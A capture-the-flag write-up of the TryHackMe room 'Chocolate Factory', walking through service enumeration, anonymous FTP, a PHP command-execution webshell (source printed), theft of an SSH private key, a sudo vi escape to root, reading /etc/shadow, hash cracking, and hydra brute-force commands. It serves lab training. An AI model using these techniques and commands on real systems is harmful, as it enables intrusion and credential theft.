Chocolate Factory - Write-up - TryHackMe

Saturday 23 January 2021 (2021-01-23)

Saturday 14 September 2024 (2024-09-14)

noraj (Alexandre ZANNI)

eop, ftp, php, security, thm, web, writeups

🇬🇧

Information

Room#

Name: Chocolate Factory
Profile: tryhackme.com
Difficulty: Easy
Description: A Charlie And The Chocolate Factory themed room, revisit Willy Wonka's chocolate factory!

Chocolate Factory

Write-up

Overview#

Install tools used in this WU on BlackArch Linux:

$ sudo pacman -S nmap perl-image-exiftool ffuf john hashcat hydra

Network enumeration#

Service & port discovery scan:

# Nmap 7.91 scan initiated Mon Jan 18 19:27:21 2021 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.56.113
Nmap scan report for 10.10.56.113
Host is up (0.080s latency).
Not shown: 65506 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-rw-r--    1 1000     1000       208838 Sep 30 14:31 gum_room.jpg
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.9.19.77
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| ssh-hostkey:
|   2048 16:31:bb:b5:1f:cc:cc:12:14:8f:f0:d8:33:b0:08:9b (RSA)
|   256 e7:1f:c9:db:3e:aa:44:b6:72:10:3c:ee:db:1d:33:90 (ECDSA)
|_  256 b4:45:02:b6:24:8e:a9:06:5f:6c:79:44:8a:06:55:5e (ED25519)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| http-methods:
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
...
112/tcp open  mcidas?
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
|   GenericLines, NULL:
|     "Welcome to chocolate room!!
|     ___.---------------.
|     .'__'__'__'__'__,` . ____ ___ \r
|     _:\x20 |:. \x20 ___ \r
|     \'__'__'__'__'_`.__| `. \x20 ___ \r
|     \'__'__'__\x20__'_;-----------------`
|     \|______________________;________________|
|     small hint from Mr.Wonka : Look somewhere else, its not here! ;)
|_    hope you wont drown Augustus"
113/tcp open  ident?
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
|   GenericLines, Help, NCP, NULL, NotesRPC, SSLSessionReq:
|_    http://localhost/key_rev_key <- You will find the key here!!!
114/tcp open  audionews?
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
|   GenericLines, NULL:
|     "Welcome to chocolate room!!
|     ___.---------------.
|     .'__'__'__'__'__,` . ____ ___ \r
|     _:\x20 |:. \x20 ___ \r
|     \'__'__'__'__'_`.__| `. \x20 ___ \r
|     \'__'__'__\x20__'_;-----------------`
|     \|______________________;________________|
|     small hint from Mr.Wonka : Look somewhere else, its not here! ;)
|_    hope you wont drown Augustus"
...

There is some useless rabbit hole from port 100 to 125 but look at port 113!

FTP discovery#

$ ftp 10.10.56.113
Connected to 10.10.56.113.
220 (vsFTPd 3.0.3)
Name (10.10.56.113:noraj): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -A
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 1000     1000       208838 Sep 30 14:31 gum_room.jpg

$ ftp> get gum_room.jpg
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for gum_room.jpg (208838 bytes).
226 Transfer complete.
208838 bytes received in 0.136 seconds (1.46 Mbytes/s)
ftp>
221 Goodbye.

We have an image that we downloaded. It seems there is no metadata on it.

$ exiftool gum_room.jpg
ExifTool Version Number         : 12.00
File Name                       : gum_room.jpg
Directory                       : .
File Size                       : 204 kB
File Modification Date/Time     : 2021:01:18 19:30:23+01:00
File Access Date/Time           : 2021:01:18 19:30:23+01:00
File Inode Change Date/Time     : 2021:01:18 19:31:54+01:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM)
Image Width                     : 1920
Image Height                    : 1080
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1920x1080
Megapixels                      : 2.1

This may be a rabbit hole.

Port 113#

There is a hint on port 113.

113/tcp open  ident?
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
|   GenericLines, Help, NCP, NULL, NotesRPC, SSLSessionReq:
|_    http://localhost/key_rev_key <- You will find the key here!!!

Then we can get the key.

$ wget http://10.10.56.113/key_rev_key

Let's look, it's not a key but a binary:

$ strings key_rev_key
...
Enter your name:
laksdhfas
 congratulations you have found the key:
b'edited'
 Keep its safe
Bad name!
...

The key: -VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY=

By the way the username was laksdhfas.

Web enumeration#

$ ffuf -u http://10.10.56.113/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -fc 403

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.2.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.56.113/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
 :: Filter           : Response status: 403
________________________________________________

index.html              [Status: 200, Size: 1466, Words: 87, Lines: 70]
home.php                [Status: 200, Size: 569, Words: 29, Lines: 32]
.                       [Status: 200, Size: 1466, Words: 87, Lines: 70]
validate.php            [Status: 200, Size: 93, Words: 2, Lines: 1]
index.php.bak           [Status: 200, Size: 273, Words: 45, Lines: 13]

There is webshell on http://10.10.56.113/home.php.

And index.php.bak seems to be a backup of that webshell.

<html>
<body>
<form method="POST">
    <input id="comm" type="text" name="command" placeholder="Command">
    <button>Execute</button>
</form>
<?php
    if(isset($_POST['command']))
    {
        $cmd = $_POST['command'];
        echo shell_exec($cmd);
    }
?>

Web exploitation & EoP from www-data to charlie#

So if we run: ls -lhA /home/charlie we get:

total 32K
-rw-r--r-- 1 charlie charley 3.7K Apr  4  2018 .bashrc
drwx------ 2 charlie charley 4.0K Sep  1 17:17 .cache
drwx------ 3 charlie charley 4.0K Sep  1 17:17 .gnupg
drwxrwxr-x 3 charlie charley 4.0K Sep 29 18:08 .local
-rw-r--r-- 1 charlie charley  807 Apr  4  2018 .profile
-rw-r--r-- 1 charlie charley 1.7K Oct  6 17:13 teleport
-rw-r--r-- 1 charlie charley  407 Oct  6 17:13 teleport.pub
-rw-r----- 1 charlie charley   39 Oct  6 17:11 user.txt

We can retrieve a private key: cat /home/charlie/teleport

Let's set the right permissions on it and connect via SSH with it:

$ chmod 600 teleport
$ ssh -i teleport charlie@10.10.56.113
charlie@chocolate-factory:/$ pwd
/
charlie@chocolate-factory:/$ cd /home/charlie
charlie@chocolate-factory:/home/charlie$ cat user.txt
flag{edited}

User flag: flag{cd5509042371b34e4826e4838b522d2e}

We can also read the source code of the login page:

root@chocolate-factory:/var/www/html# cat validate.php
<?php
        $uname=$_POST['uname'];
        $password=$_POST['password'];
        if($uname=="charlie" && $password=="edited"){
                echo "<script>window.location='home.php'</script>";
        }
        else{
                echo "<script>alert('Incorrect Credentials');</script>";
                echo "<script>window.location='index.html'</script>";
        }

Charlie's password: cn7824

Elevation of Privilege (EoP): from charlie to root#

We can launch vi as root:

$ charlie@chocolate-factory:/home/charlie$ sudo -l
Matching Defaults entries for charlie on chocolate-factory:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User charlie may run the following commands on chocolate-factory:
    (ALL : !root) NOPASSWD: /usr/bin/vi
charlie@chocolate-factory:/home/charlie$ sudo vi

Then in vi launch a shell: :!/bin/bash.

There is no flag but a python script:

root@chocolate-factory:/home/charlie# id
uid=0(root) gid=0(root) groups=0(root)
root@chocolate-factory:/home/charlie# cd /root
root@chocolate-factory:/root# cat root.txt
cat: root.txt: No such file or directory
root@chocolate-factory:/root# ls
root.py

Let's see the script:

from cryptography.fernet import Fernet
import pyfiglet
key=input("Enter the key:  ")
f=Fernet(key)
encrypted_mess= 'gAAAAABfdb52eejIlEaE9ttPY8ckMMfHTIw5lamAWMy8yEdGPhnm9_H_yQikhR-bPy09-NVQn8lF_PDXyTo-T7CpmrFfoVRWzlm0OffAsUM7KIO_xbIQkQojwf_unpPAAKyJQDHNvQaJ'
dcrypt_mess=f.decrypt(encrypted_mess)
mess=dcrypt_mess.decode()
display1=pyfiglet.figlet_format("You Are Now The Owner Of ")
display2=pyfiglet.figlet_format("Chocolate Factory ")
print(display1)
print(display2)

The script is asking for the key to decrypt the flag:

root@chocolate-factory:/root# python root.py
Enter the key:  "-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY="
__   __               _               _   _                 _____ _
\ \ / /__  _   _     / \   _ __ ___  | \ | | _____      __ |_   _| |__   ___
 \ V / _ \| | | |   / _ \ | '__/ _ \ |  \| |/ _ \ \ /\ / /   | | | '_ \ / _ \
  | | (_) | |_| |  / ___ \| | |  __/ | |\  | (_) \ V  V /    | | | | | |  __/
  |_|\___/ \__,_| /_/   \_\_|  \___| |_| \_|\___/ \_/\_/     |_| |_| |_|\___|

  ___                              ___   __
 / _ \__      ___ __   ___ _ __   / _ \ / _|
| | | \ \ /\ / / '_ \ / _ \ '__| | | | | |_
| |_| |\ V  V /| | | |  __/ |    | |_| |  _|
 \___/  \_/\_/ |_| |_|\___|_|     \___/|_|


  ____ _                     _       _
 / ___| |__   ___   ___ ___ | | __ _| |_ ___
| |   | '_ \ / _ \ / __/ _ \| |/ _` | __/ _ \
| |___| | | | (_) | (_| (_) | | (_| | ||  __/
 \____|_| |_|\___/ \___\___/|_|\__,_|\__\___|

 _____          _
|  ___|_ _  ___| |_ ___  _ __ _   _
| |_ / _` |/ __| __/ _ \| '__| | | |
|  _| (_| | (__| || (_) | |  | |_| |
|_|  \__,_|\___|\__\___/|_|   \__, |
                              |___/

flag{edited}

Root flag: flag{cec59161d338fef787fcb4e296b42124}

Bonus: hash cracking#

We may have missed charlie's password so now that we are root let's grep the hash and crack it.

root@chocolate-factory:/root# cat /etc/shadow
root:$6$.hWj2crD$ch//0HP/gRcEpyW10XktEpu0bDYU51MZaUuzHpb..Han2SFSiNEZgc1/utcnlKbyyhUKb768ouSAd8ITNlWlb/:18534:0:99999:7:::
...
charlie:$6$J1Cmev6V$ifUMOM0VViXR0/8BKz7FLIG8mkT5i1QHdzAXV6A.9l8g51baubW6QK4CHKuKzRGL75cmc/W6hv3VNUSOukcmM1:18534:0:99999:7:::

Crack the hash with john:

$ john --format=sha512crypt hashes.txt --wordlist=/usr/share/wordlists/passwords/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
2232             (root)
2232             (charlie)
2g 0:00:05:10 DONE (2021-01-18 20:37) 0.006434g/s 1433p/s 2867c/s 2867C/s 231116..2221985
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Crack the hash with hashcat:

$ hashcat -m 1800 hashes.txt /usr/share/wordlists/passwords/rockyou.txt -O

Both the web and system passwords are included in rockyou so we could just have used hydra to brute-force them (but it would have required a ridiculous amount of time because the BF over SSH is only about 30 tries/min and about 2800 tries/min over HTTP).

$ hydra -l root -P /usr/share/wordlists/passwords/rockyou.txt 10.10.56.113 -t 4 ssh
$ hydra -l charlie -P /usr/share/wordlists/passwords/rockyou.txt 10.10.56.113 http-post-form '/validate.php:uname=^USER^&password=^PASS^:F=Incorrect'